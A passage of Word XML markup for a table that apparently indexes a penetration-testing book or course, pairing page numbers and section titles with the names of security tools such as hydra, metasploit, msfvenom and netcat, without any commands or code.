      <w:tr w:rsidR="006E4E41" w14:paraId="44B48ED8" w14:textId="77777777" w:rsidTr="000D1EE6">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7D27C4DA" w14:textId="683844E3" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41-69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="79B7D488" w14:textId="2706612F" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1C6150A2" w14:textId="4DE5168D" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Port, Service and Web Page Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5C5F07A1" w14:textId="7F2BA259" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="43787DF0" w14:textId="77777777" w:rsidTr="00F0782F">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63E353C7" w14:textId="2B51E4BC" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="2311DFF2" w14:textId="24ED5D58" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="7FC91AE8" w14:textId="7A481E60" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="611A27DF" w14:textId="7DB66292" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>searchsploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="797710A9" w14:textId="77777777" w:rsidTr="004E79B2">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79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="62E519F3" w14:textId="68A4B515" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="0A217AC4" w14:textId="199B6EF8" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>72</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="416F6282" w14:textId="30841B62" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="6922DCA2" w14:textId="557BAD93" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="584BF346" w14:textId="77777777" w:rsidTr="00F0782F">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B405533" w14:textId="37BAC369" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="5E113FE5" w14:textId="4F4205BD" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="56CD2123" w14:textId="1D62F865" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="167D199A" w14:textId="053421AB" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="2F71078E" w14:textId="77777777" w:rsidTr="00F0782F">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="70AFB4C4" w14:textId="34A7FFC8" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FB6C9B4" w14:textId="49072A77" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="4264B3AA" w14:textId="5FDADA6A" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C4D6038" w14:textId="5AC87202" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00812C66">
              <w:t xml:space="preserve">MSF: </w:t>
            </w:r>
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00812C66">
              <w:t xml:space="preserve">ossible </w:t>
            </w:r>
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00812C66">
              <w:t xml:space="preserve">rivilege </w:t>
            </w:r>
            <w:r>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00812C66">
              <w:t>scalation</w:t>
            </w:r>
            <w:r w:rsidR="00DB1D85">
              <w:t xml:space="preserve"> | GTFOBins</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="0ACEE0A8" w14:textId="77777777" w:rsidTr="00F0782F">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="06EC86A4" w14:textId="7EFE8D6C" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="3AF5FF52" w14:textId="7A2D0D12" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>75</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="0A50BA0B" w14:textId="4027AFD0" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="55FDF5E3" w14:textId="52EDBF03" w:rsidR="004E79B2" w:rsidRPr="00812C66" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00812C66">
              <w:t xml:space="preserve">MSF: </w:t>
            </w:r>
            <w:r>
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00812C66">
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00812C66">
              <w:t>ress - wp_admin_shell_upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="6716074F" w14:textId="77777777" w:rsidTr="00DC2A77">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7516B163" w14:textId="77E101F6" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="02A01AB4" w14:textId="24AC0784" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>76</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="532D290E" w14:textId="53E20B0D" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="068CEABD" w14:textId="6B3A36AB" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="68F9FFB3" w14:textId="77777777" w:rsidTr="00DC2A77">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6BA78A3B" w14:textId="47BAE3D1" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="156EFA63" w14:textId="52732191" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>77</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D8872AB" w14:textId="7122350E" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="56A3E7A1" w14:textId="58D0281E" w:rsidR="004E79B2" w:rsidRPr="00132425" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00132425">
              <w:t xml:space="preserve">rmitage | </w:t>
            </w:r>
            <w:r>
              <w:t>thefatr</w:t>
            </w:r>
            <w:r w:rsidRPr="00132425">
              <w:t>at</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E79B2" w14:paraId="7BB10EF4" w14:textId="77777777" w:rsidTr="00F15476">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="017A2873" w14:textId="56D5730F" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="466E639F" w14:textId="7205D6A9" w:rsidR="004E79B2" w:rsidRDefault="004E79B2" w:rsidP="004E79B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
